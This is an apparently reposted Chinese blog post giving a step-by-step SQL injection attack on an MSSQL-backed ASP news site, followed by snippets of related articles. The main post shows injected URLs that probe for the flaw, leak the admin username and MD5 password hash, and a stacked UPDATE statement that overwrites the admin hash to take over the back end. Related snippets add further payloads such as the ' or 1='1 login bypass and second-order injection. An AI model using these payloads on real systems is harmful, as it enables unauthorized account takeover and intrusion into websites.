黄聪:SQL注入直接修改管理员密码的MD5值

最新推荐文章于 2024-04-14 01:21:28 发布
最新推荐文章于 2024-04-14 01:21:28 发布
阅读量270 收藏
点赞数
文章标签: 数据库

直接修改管理员密码的MD5值 然后进后台!(条件 MSSQL)

测试如下:

http://www.xx.com/news.asp?id=121

在地址后输入单引号,显示

Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’

字符串 ’’’ 之前有未闭合的引号

/news/dws.asp,行63

说明没有过滤单引号且数据库是MSSQL.

and 1=1正常。and 1=2出错。肯定存在注入

接着输入

http://www.xx.com/news.asp?id=1 or admin_user in (select id from admin)

得到帐号为:admin

http://www.xx.com/news.asp?id=121 or admin_password in (select id from admin)

得到密码为:a4716077c2ba075c

接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433

命令如下 :

;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–

这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的。

以上仅供参考!

weixin_34214500
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于客户行为分析与企业销售预测的客户管理决策模型与算法研究_黄聪
07-31
基于客户行为分析与企业销售预测的客户管理决策模型与算法研究_黄聪
WordPress主题开发教程六:主循环(The Loop)
01-20
下面就让我们来开始学习wordpress主循环(The Loop)在模板中的应用。 ... ... 记住,为了学习这些代码,请尽量手工输入而不是拷贝和粘贴。 第1步:创建 container Div 在 header DIV 标签下添加一个 DIV 标签,并给它的 ...
SQL注入直接修改管理员密码MD5
收集盒 Book box
06-27 2723
 经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。可是密码MD5加密的。而且在线的MD5解密不了。你说咋办?今天俺就整了个新方法,直接修改管理员密码MD5。然后进后台!(当然是有条件的。MSSQL)测试如下:http://www.tmdsb.com/news.asp?id=121在地址后输入单引号,显示Microsoft OLE DB
mysql 注入 修改密码_SQL注入-二次注入修改其他用户密码
weixin_42463997的博客
01-19 528
二次注入1、使用特殊的SQL符号注册账号$username= mysql_escape_string($_POST['username']) ;$pass= mysql_escape_string($_POST['password']);$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")...
sql注射修改管理密码
weixin_30507481的博客
07-07 81
很多时候我们找到了注入点,管理员用户名也猜到了,可就是破解不了Md5密文。很多人到这里都会选择放弃。我们知道sql注入可以进行字段查询,既然可以查询,那么它同样也可以进行字段更新。我们只要把管理员密码Md5替换为我们自己的可破解的Md5即可。 注入点已经找到:http://xxx.com/book.asp?id=1996 我刚已经用NB检测过了。可以看到,存在表...
06_SQL注入_二次注入&加密解密
qq_42171569的博客
05-18 1077
06_SQL注入_加密注入&二次注入 1.加密注入 SQL注入的思路是用户用自定义语句和原本的SQL语句拼接,但有时开发者会对获取到的数据进行加密,那么对于渗透测试者而言如果想要在这样的情况下进行操作,则需要将自己的注入语句进行相同的加密处理后与原本的语句进行拼接。这种类型的大体思路和先前的思路整体无异,唯一的区别就是需要测试者先写好payload,再进行加密,随后将数据包放出进行注入尝试。 加密类型的注入在SQLi-Labs中得到了复现,实验如下: 【靶场】SQLi-Labs less-21 【
Web安全之SQL注入_web注入,2024年最新让你明明白白的使用RecyclerView
最新发布
2401_83947353的博客
04-14 583
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
超市管理系统(C#源码) 超市管理系统(C#源码).
06-28
超市管理系统是一种用于自动化管理超市日常运营的软件工具,它涵盖了商品采购、库存管理、销售记录、会员服务、财务报表等多个核心功能。在这个项目中,我们主要关注的是使用C#编程语言编写的源代码。C#是一种面向...
wordpress 视频教程+主题+模板
10-16
01 黄聪:2016最新Wordpress主题模版、插件开发教程 (2套) 02 WordPress初级入门(7套) 03 WordPress高级实战(10套) 04 WordPress实战SEO优化(5套) 05 WordPress其他实战教程(6套) 06 WP百科网视频教程全集...
全flash网页5
06-22
在IT行业中,Flash曾是构建动态、交互式网页的重要技术,尤其在制作“全Flash网页5”这样的项目中,它发挥了关键作用。本项目显然利用了Adobe Flash软件来设计和开发,通过ActionScript(AS)编程语言赋予了网页丰富...
SQL注入】靶场SQLI DUMB SERIES-24通过二次注入重置用户密码
开水的博客
02-21 213
先使用已知信息admin/admin登录进去查下题,发现可以修改密码。第三步,进入修改密码界面,随机输入一个旧密码,然后将需要重置的密码。第一步,注册一个新用户:admin’#/123456。,因此注释符#后面的内容都被注释,导致我们不需要知道。第二步,登录刚刚注册的admin’#用户。用户的密码,即可重置。
mysql数据库md5密码替换_MD5 加密的密码数据库重置
weixin_35241415的博客
01-21 2060
如果不小心更改掉了项目管理员帐号的密码而又忘了,存在数据库里的密码又是MD5加密后的,这时候怎么办呢?1. oracle数据库,可以用DBMS_OBFUSCATION_TOOLKIT.MD5 ( input => utl_raw.cast_to_raw('预置密码'))来得到一个MD5加密后的密码:SQL如下:-----这里得到的md5是大写的,如果数据库中存储的是小写,需要再用lower...
黑客学习-sql注入-二次注入
weixin_49349476的博客
11-24 312
通过二次注入漏洞,把账号更改成我们设置的密码,使能里账号和密码 进行登录
2021-08-17 织梦cms仿站:后台忘记密码如何修改
weixin_56803901的博客
08-17 176
相信很多学习建站的朋友,都可能会出现织梦后台忘记密码的情况,小编为大家分享一下如何在数据库文件中解决这个问题: 1.找到数据库,以西部数码虚拟主机为例 2.点击管理数据库,进入数据库页面 3.点击织梦的数据库,进入Php文件列表 4.找到dede_admin文件,进行查看修改md5代码 5.pwd栏目下的,即为密码md5密码,需要使用软件破解加密,即可知道原始密码;如果需要修改密码的,可以在网上搜索:md5转换,进行修改 6.小编在网上找了一个网页版,效果还不错,免费的;https://www.be
SQL注入——通过注入得到已知用户名的密码
热门推荐
以梦为马,不负韶华
12-08 2万+
· PHP代码如下: <?php //error_reporting(0); $link =mysqli_connect('localhost', 'root', 'root', 'test'); if (!$link) { die('Could not connect to MySQL: ' .mysqli_connect_error()); } $link->se
SQL注入获取用户名密码练习(integer型注入)
nielilijy的专栏
08-07 1万+
万能密码 ' or 1='1 select name,pass from tbAdmin where name=‘admin’ and pass=‘123456’ select name,pass from tbAdmin where name=’’ or 1=‘1’ and pass=‘123456’ 1=‘1’ 永远为真 这个也是OWASP放出来的一个web安全学习平台,PHP+M...
如何修改SQL Server 2000系统管理员Sa的登录密码
Johnson的专栏
10-17 5758
分析:SQL Server 2000系统管理员Sa的登录密码,一般在安装SQL Server 2000时就已经设置。在数据库管理系统中,用检查口令等手段来检查用户身份,合法的用户才能进入数据库系统。千方百剂系列需要通过验证Sa登录密码才能创建、删除账套,这样Sa的登录密码在此就显得尤为重要。  操作步骤如下:  1. 打开企业管理器,依次展开服务器组,然后展开服务器。  2. 打开“安全性”文
shop靶机实践sql盲注获取后台管理员账号密码
过客璇璇的博客
03-15 3728
shop靶机盲注获取后台管理员账号密码 找到注入点。 注入点:http://192.168.244.131:60785/shop/productshopxp.asp?id=485 首先分析一下为什么确定这是一个注入点: 一、 正常页面如下: 二、 在URL后加’即http://192.168.244.131:60785/shop/productshopxp.asp?id=485...
修改登陆密码sql语句
weixin_33834137的博客
08-19 1000
exec sp_password '旧密码','新密码','用户名' 转载于:https://www.cnblogs.com/windback/archive/2011/08/19/2145940.html
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值